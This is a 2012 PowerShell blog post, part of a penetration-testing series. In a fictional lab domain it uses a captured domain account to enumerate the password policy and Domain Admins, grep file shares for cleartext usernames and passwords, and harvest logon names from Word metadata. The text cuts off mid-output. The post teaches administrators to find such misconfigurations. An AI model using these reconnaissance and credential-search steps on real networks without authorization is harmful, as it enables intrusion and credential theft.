{"id":8821,"date":"2012-07-04T00:01:00","date_gmt":"2012-07-04T00:01:00","guid":{"rendered":"https:\/\/blogs.technet.microsoft.com\/heyscriptingguy\/2012\/07\/04\/use-powershell-to-discover-network-information-from-shares\/"},"modified":"2012-07-04T00:01:00","modified_gmt":"2012-07-04T00:01:00","slug":"use-powershell-to-discover-network-information-from-shares","status":"publish","type":"post","link":"https:\/\/devblogs.microsoft.com\/scripting\/use-powershell-to-discover-network-information-from-shares\/","title":{"rendered":"Use PowerShell to Discover Network Information from Shares"},"content":{"rendered":"<p><b>Summary<\/b>: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata.\nMicrosoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude.<\/p>\n<p style=\"padding-left: 30px\">Niklas Goude is a Security Consultant at TrueSec and an MVP in Windows PowerShell. In addition to his work performing security assessments for a variety of clients, he also has extensive experience in using Windows PowerShell to automate and implement Windows environments. He has been speaking at TechDays; SharePoint conferences in the U.S., Australia, and New Zealand; and other events and conferences. He is the author of two books about Windows PowerShell, and he shares his knowledge at <a href=\"http:\/\/www.powershell.nu\/\" target=\"_blank\">PowerShell.nu<\/a>. He is a member of the TrueSec Expert Team, an independent, elite team of security and infrastructure consultants that operates all over the world. The security team at TrueSec performs various tasks and services related to IT security such as code review, security health checks, and penetration testing. TrueSec also delivers top-notch training sessions in advanced IT security. Check out the <a href=\"http:\/\/www.truesec.com\/\" target=\"_blank\">TruSec<\/a> website for additional information.\nThis is the third blog in a series of five, and we will talk about basic penetration testing techniques and how they affect misconfigured systems. The series covers everything from initial network reconnaissance techniques and brute force attacks to advanced extraction of registry secrets to assess dangerous system dependencies.\nThe key learning point is to demonstrate how you can use Windows PowerShell to accomplish almost any task&mdash;no matter the subject. The secondary learning point is to make you aware of common security issues and misconfigurations that may occur in Microsoft infrastructures today. One important thing to keep in mind is that the vulnerabilities we are looking for exist simply because of misconfigurations made by administrators, such as weak passwords or system dependencies.\nI hope you will learn and enjoy!<\/p>\n<h2><b>Part 3: Shares and metadata<\/b><\/h2>\n<p>Penetration testing is an important part of improving security in any network environment. A hacker only needs to find a few weaknesses (even one) to compromise important IT systems. An important task for an IT administrator is to identify potential weaknesses and mitigate them.\nAs soon as an attacker has access to a domain account, the attacker can start to collect information by asking questions to a service in various ways. One example would be to display all accounts that are available in the domain, determine the domain policy, search through shares for sensitive data and anything else that would help the attacker finding more privileged accounts.\nIn the previous scenario, we managed to get our hands on a domain user&rsquo;s logon name and password. In today&rsquo;s scenario, we will use the domain account and focus on how to enumerate domain groups, policies, and shared resources by using Windows PowerShell.<\/p>\n<h2>Scenario<\/h2>\n<p>This scenario is based on a Windows domain environment consisting of three machines:<\/p>\n<ul>\n<li>DC01: domain controller<\/li>\n<li>SRV01: SQL Server and IIS<\/li>\n<li>SP01: SharePoint 2010, SQL Server, and IIS<\/li>\n<\/ul>\n<p>In addition, we have a client on the same network as the domain; however, the client is not a member of the domain. Each command in this scenario is executed from the client.\nThe server, SRV01, has a share where the domain users have access. The share is used to back up Word documents, files, and other data. The Word documents have simply been copied to the share.\nFor mitigation information, please see <a href=\"http:\/\/office.microsoft.com\/en-us\/word-help\/remove-hidden-data-and-personal-information-by-inspecting-documents-HA010354329.aspx\" target=\"_blank\">Remove hidden data and personal information by inspecting documents<\/a>.<\/p>\n<h2>Code<\/h2>\n<p>With an actual domain account and password available, we can start searching for more information. The first step is to start Windows PowerShell on our attack machine by using the <b>runas<\/b> command with the <b>\/netonly<\/b> switch. The syntax of this command is shown here.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; runas \/netonly \/user:hacmeuser008 powershell_ise.exe<br \/> Enter the password for hacmeuser008\nWhen prompted for a password, we enter the password that we discovered in a previous post. Next, we can use the WinNT provider and ask for the default domain password policy settings.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $domain = [adsi](&#8220;WinNT:\/\/hacme.local&#8221;)<\/p>\n<p style=\"padding-left: 30px\">$domain.Properties.Keys | Foreach {<\/p>\n<p style=\"padding-left: 30px\">&nbsp; @{$_ = [string]$domain.Properties.Item($_) }<\/p>\n<p style=\"padding-left: 30px\">}<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Value&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">MinPasswordLength&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">MaxPasswordAge&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3628800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">MinPasswordAge&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 86400&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">PasswordHistoryLength&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 24&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hacme.local&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">AutoUnlockInterval&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">LockoutObservationInterval&nbsp;&nbsp;&nbsp;&nbsp; 1800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">MaxBadPasswordsAllowed&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;\nThe output tells us that the minimum password length is 7 characters. It also displays that the maximum bad passwords allowed is set to 0, meaning that the system does not implement an account lockout policy. This means that we can make as many brute force attempts as we want without worrying about locking out an account.\nOne of our goals is to find high-privileged accounts, so let&rsquo;s take a peek at the members of the Domain Admin group by using ADSI:<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $dAdmin = [adsi]&#8221;LDAP:\/\/CN=Domain Admins,CN=Users,DC=hacme,DC=local&#8221;<\/p>\n<p style=\"padding-left: 30px\">$dAdmin.member<\/p>\n<p style=\"padding-left: 30px\">CN=SQL-Serviceaccount,OU=ServiceAccounts,OU=Hacme,DC=hacme,DC=local<\/p>\n<p style=\"padding-left: 30px\">CN=Administrator,CN=Users,DC=hacme,DC=local\n&nbsp;The output tells us that there are three members of the Domain Admin group. We&rsquo;ll get back to those accounts later.\nFor now, let us move on and look at enumerating shares and searching through files for sensitive data, such as connection strings and passwords. Because we are running the Windows PowerShell ISE by using a domain account, we can use <b>dir<\/b> (alias for <b>Get-ChildItem<\/b>) with the <b>&ndash;Recurse<\/b> switch to get the files and folders from a network drive.\nTo find out if a server is sharing any folders, we simply type <b>dir \\SRV01<\/b> and let the IntelliSense do the work for us. This technique is shown here.\nIsn&rsquo;t IntelliSense wonderful! Based on the information displayed in the previous example, we see that in addition to the hidden shares. We can test accessing a share by using the <b>Get-ChildItem<\/b> cmdlet. If our account has access, the command outputs the files and folders that we have access to.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\srv01Share -Recurse | Select FullName<\/p>\n<p style=\"padding-left: 30px\">FullName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">&#8212;&#8212;&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01Sharefolder&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01ShareDocument001.docx&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01ShareDocument002.docx&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01ShareDocument003.docx&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01ShareDocument004.docx&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01ShareDocument005.docx&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01Sharetestscript.ps1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01SharefolderFoo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01Sharefolderold.vbs&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01SharefolderFooNew Text Document.txt&nbsp;&nbsp;&nbsp;&nbsp;\nIt seems as if our account has access to the share. The share contains a couple of Word documents, a .ps1 file, a .vbs file, an .xml file, and a .txt file. To find out if any of the files contain sensitive data, we can pipe the objects to the <b>Select-String<\/b> cmdlet and set up a pattern of interest. In this example, we will search for user name and password. We will also filter out the files with the extensions .ps1, .vbs, .xml, and .txt.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\srv01Share -Recurse -Include *.txt,*.vbs,*.ps1,*.xml |<\/p>\n<p style=\"padding-left: 30px\">Select-String -Pattern &#8220;username|password&#8221;<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">\\srv01SharefolderInput.xml:5:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Username&gt;hacmespaccount&lt;\/Username&gt;<\/p>\n<p style=\"padding-left: 30px\">\\srv01SharefolderInput.xml:6:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Password&gt;Summer2012!&lt;\/Password&gt;<\/p>\n<p style=\"padding-left: 30px\">\\srv01Sharetestscript.ps1:1:# Get Username and password\nIf we study the output, we notice that someone left a Windows PowerShell script with a comment about user name and password and an .xml file that contains a user name and password in clear text. Let&rsquo;s take a closer look by adding the <b>&ndash;Context<\/b> parameter and look at the lines before and after the matched lines.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\srv01Share -Recurse -Include *.txt,*.vbs,*.ps1,*.xml |<\/p>\n<p style=\"padding-left: 30px\">Select-String -Pattern &#8220;username|password&#8221; -Context 2,2<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01SharefolderInput.xml:3:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Passphrase&gt;P@ssPhrase&lt;\/Passphrase&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01SharefolderInput.xml:4:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Account AddToLocalAdminsDuringSetup=&#8221;true&#8221;&gt;&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp;\\srv01SharefolderInput.xml:5:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Username&gt;hacmespaccount&lt;\/Username&gt;&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01SharefolderInput.xml:6:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Password&gt;Summer2012!&lt;\/Password&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01SharefolderInput.xml:7:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;Email&gt;spaccount@hacme.local&lt;\/Email&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01SharefolderInput.xml:8:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;\/Account&gt;&gt;<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01Sharetestscript.ps1:1:# Get Username and password<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01Sharetestscript.ps1:2:$cred = Get-Credential<\/p>\n<p style=\"padding-left: 30px\">&nbsp; \\srv01Sharetestscript.ps1:3:gwmi WIn32_OperatingSystem -COmputerName sp01 -Credential $cred\nThe Windows PowerShell script stored on the share uses <b>Get-Credential<\/b> as input, so it doesn&rsquo;t tell us much. However, the input.xml file seems to be a configuration file for some product (probably SharePoint because the environment only uses three servers). What is even more interesting is that the .xml file has a line that says: &lt;Account AddToLocalAdminsDuringSetupe=&rdquo;true&rdquo;&gt;. We will investigate local admin accounts in the next post.\nThe share also contained some Word documents, and sometimes Word documents can contain metadata that describes user information such as a user&rsquo;s logon name. Because we are already on the domain, this is not very interesting for us at the moment&mdash;we can simply enumerate the domain and retrieve all the domain accounts. However, this would be useful if we failed in any of our previous attacks.\nThere are a lot of public Word documents available on the Internet, and by simply looking at the metadata, we could find users logon names. Let us see how that works. In this example we&rsquo;ll simply copy the Word documents from the share to a local folder and start peeking at the metadata.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir \\srv01Share -Recurse -Include *.docx |<\/p>\n<p style=\"padding-left: 30px\">Copy-Item -Destination C:temp\nIf we want to read the metadata, we can use the <b>Com<\/b> object <b>Word.Application<\/b>. The <b>Com<\/b> object requires that Word is installed on the system. First we create an instance of <b>Word.Applciation<\/b>. We also set the visible property to <b>$false<\/b>.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $word = New-Object -comobject Word.Application<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $word.Visible = $false&nbsp;\nNext, we open the document by using the <b>Open()<\/b> method.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $openDoc = $word.Documents.Open(&#8220;C:tempDocument001.docx&#8221;)&nbsp;\nThen, we access the XML, and store the <b>core.xml<\/b> information in a variable.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $docX = [xml]$OpenDoc.WordOpenXML<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $coreXML = $docX.package.part | Where { $_.name -eq &#8220;\/docProps\/core.xml&#8221; }\nAnd now we can simply take a peek in the <b>CoreProperties<\/b>, which may give us information regarding user&rsquo;s logon names.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; $coreXML.xmlData.coreProperties<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">cp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/schemas.openxmlformats.org\/package\/2006\/metadata\/core-properties<\/p>\n<p style=\"padding-left: 30px\">dc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/elements\/1.1\/<\/p>\n<p style=\"padding-left: 30px\">dcterms&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/terms\/<\/p>\n<p style=\"padding-left: 30px\">dcmitype&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/purl.org\/dc\/dcmitype\/<\/p>\n<p style=\"padding-left: 30px\">xsi&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : http:\/\/www.w3.org\/2001\/XMLSchema-instance<\/p>\n<p style=\"padding-left: 30px\">creator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : Jean-Luc Picard (user001)<\/p>\n<p style=\"padding-left: 30px\">lastModifiedBy : Jean-Luc Picard (user001)<\/p>\n<p style=\"padding-left: 30px\">revision&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 1<\/p>\n<p style=\"padding-left: 30px\">created&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : created<\/p>\n<p style=\"padding-left: 30px\">modified&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : modified&nbsp;\nNotice how the metadata displays the user&rsquo;s first name, last name, and logon name.\nNow, let&rsquo;s script it and repeat it on all the downloaded documents. In this example, we&rsquo;ll use the <b>Get-TSWordXMetadata<\/b> function.<\/p>\n<p style=\"padding-left: 30px\">PS &gt; dir C:temp | Get-TSWordXMetadata |<\/p>\n<p style=\"padding-left: 30px\">Select Creator, LastModifiedBy<\/p>\n<p style=\"padding-left: 30px\">&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Creator&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LastModifiedBy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 